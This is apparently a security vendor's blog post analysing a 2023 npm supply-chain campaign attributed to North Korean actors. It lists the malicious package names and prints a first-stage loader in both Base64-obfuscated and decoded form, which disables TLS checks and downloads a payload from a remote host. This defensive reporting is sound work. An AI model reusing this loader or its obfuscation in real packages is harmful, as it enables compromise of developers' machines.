June’s Sophisticated npm Attack Attributed to North Korea
In June 2023, Phylum was the first to unearth a series of suspicious npm publications belonging to what appeared to be a highly targeted attack. The identified packages, published in pairs, required installation in a specific sequence, subsequently retrieving a token that facilitated the download of a final malicious payload from a remote server. A recent security alert from GitHub publicly attributes this cyber-attack—which they were investigating independently—to threat actors with strong ties to North Korean objectives. In this article, we delve deeper into the context of this attack, while also unveiling novel information uncovered by Phylum since our initial publication.
--cta--
The GitHub Security Alert
On July 18, 2023 GitHub posted a security alert on their blog, sharing further insights into this attack, which they had been collaboratively investigating with npm, their subsidiary. They described it as a "low-volume social engineering campaign that targets the personal accounts of employees of technology firms." Additionally, they went on to say the following,
We assess with high confidence that this campaign is associated with a group operating in support of North Korean objectives, known as Jade Sleet by Microsoft Threat Intelligence and TraderTraitor by the U.S. Cybersecurity and Infrastructure Security Agency (CISA). Jade Sleet mostly targets users associated with cryptocurrency and other blockchain-related organizations, but also targets vendors used by those firms.
As GitHub explains, the threat actors would initially establish contact with their targets and subsequently extend an invitation to collaborate on a GitHub repository. This repository contained code that was dependent on malicious packages hosted on npm, which Phylum identified. According to the report, these malicious packages were published by the threat actors, "Only when they extended a fraudulent repository invitation, minimizing the exposure of the new malicious package to scrutiny." We hypothesize that the threat actors' servers were likely configured to only release the final payload during this brief window as well, thus explaining why we only ever retrieved "no history available" responses when investigating from our end.
North Korean Attribution
Apart from a few exceptions, the package names and domains discovered in this attack were predominantly centered around blockchain, web3, and cryptocurrency themes. Given the attribution of this attack to North Korea, both the naming choices and highly targeted nature of the attack now make sense.
North Korea is one of the most heavily sanctioned countries in the world largely due to international concerns over its continued development of their nuclear weapons program and history of human rights violations. This has left them largely isolated from the world both diplomatically and economically. In this context, North Korea's forays into hacking, particularly those associated with cryptocurrency, serve multiple purposes. In fact, the U.S. CISA (Cybersecurity & Infrastructure Security Agency) detailed some of the endeavors in a cybersecurity advisory published in April of 2022.
Diving deeper into North Korea's hacking operations, a few key motivations emerge. First, hacking provides a potential avenue to circumvent some of the sanctions imposed upon them. Second, given the anonymous nature of cryptocurrencies these digital assets can be stolen, transferred, stored, and used without leaving a traditional paper trail, thereby creating difficulties for the regulators tasked with enforcing these sanctions. Finally, this kind of hacking has the potential to cause economic disruption and serve geopolitical objectives in an effort to assert North Korea's presence and capabilities in this domain despite their extreme isolation.
Given these considerations, the situation underscores the importance of supply chain security. Despite its novel initial attack vector, this incident was fundamentally a supply chain attack. Instead of exploiting common vectors such as typosquatting or dependency confusion, the threat actors employed social engineering tactics to deceive victims into collaborating on, and ultimately executing, seemingly innocuous software that happened to rely on malicious dependencies the threat actors had published. While the initial attack vector was indeed innovative, it serves to underscore the true essence of this incident as a supply chain attack and emphasizes the crucial importance of trust in your dependencies.
Phylum Discovers New Tactics From This Campaign
Since our initial publication on June 23, Phylum’s automated detection platform has alerted us to a few other packages from this campaign. In a clear and obvious effort to further evade automated detection, we witnessed the threat actors obfuscate the strings in a few packages by simply Base64-encoding them. Here's an example:
const os = require(atob("b3M="));
const path = require(atob("cGF0aA=="));
var fs = require(atob('ZnM='));
const w = atob('LmVsZWN0cm9u');
const f = atob('Y2FjaGU=');
const va = atob('ZGFyd2lu');
async function start(){
process.env[atob('Tk9ERV9UTFNfUkVKRUNUX1VOQVVUSE9SSVpFRA==')] = 0
var dir = path.join(os.homedir(), w);
if (!fs.existsSync(dir)){
fs.mkdirSync(dir);
}
var axios = require(atob('YXhpb3M='));
if (os.platform() == va){
var exec = require(atob('Y2hpbGRfcHJvY2Vzcw==')).exec;
exec(atob('bnBtIGkgLS1wcmVmaXg9fi8uZWxlY3Ryb24gZmZpLW5hcGk='), (error, stdout, stderr) => {
console.log(stderr);
});
}
var res = await axios.get(atob('aHR0cHM6Ly9ucG1hdWRpdC5jb20vYXBpL3Y0L2luaXQ='));
fs.writeFileSync(path.join(dir, f), res.data);
}
start()Here's the same code with the strings decoded:
const os = require('os');
const path = require('path');
var fs = require('fs');
const w = '.electron';
const f = 'cache';
const va = 'darwin';
async function start(){
process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = 0
var dir = path.join(os.homedir(), w);
if (!fs.existsSync(dir)){
fs.mkdirSync(dir);
}
var axios = require('axios');
if (os.platform() == va){
var exec = require('child_process').exec;
exec('npm i --prefix=~/.electron ffi-napi', (error, stdout, stderr) => {
console.log(stderr);
});
}
var res = await axios.get('https://npmaudit.com/api/v4/init');
fs.writeFileSync(path.join(dir, f), res.data);
}
start()Upon inspection, it becomes apparent that the contents are virtually identical to those in the first required stage of any package pair we initially discovered. Below is a list of packages employing the Base64-encoded tactic that we have identified so far.
js-cookie-parserxml-fast-decoderbtc-api-node
Additional Packages Since Initial Publication
Aside from the obfuscated packages mentioned above, we have also been tracking additional packages since our initial blog publication. They are as follows:
coingecko-pricesbinance-pricebinance-prices
Conclusion
The presence of nation-state actors within open-source ecosystems should not come as a major surprise for several reasons. First, the vast attack surface presented by these ecosystems is hard to ignore. It's virtually impossible for a developer in today’s world not to rely on any open-source packages. This reality is typically exploited by threat actors aiming to maximize their blast radius for widespread distribution of malware, such as stealers or ransomware. Conversely, when conducting a highly targeted attack on a specific developer or organization, the software supply chain offers an extensive surface area for intrusion.
Second, with tens of thousands of packages published daily across various ecosystems, one might assume that blending in with the noise would be relatively easy. While this may have been more feasible in the past, the rise of tools like Phylum's automated risk detection platform is making this increasingly challenging.
Regardless, the software supply chain, with its growing size and complexity, remains a prime target for cyber-attacks. As such, it continues to attract the attention of threat actors of all types, emphasizing the persistent and evolving nature of supply chain cybersecurity threats.
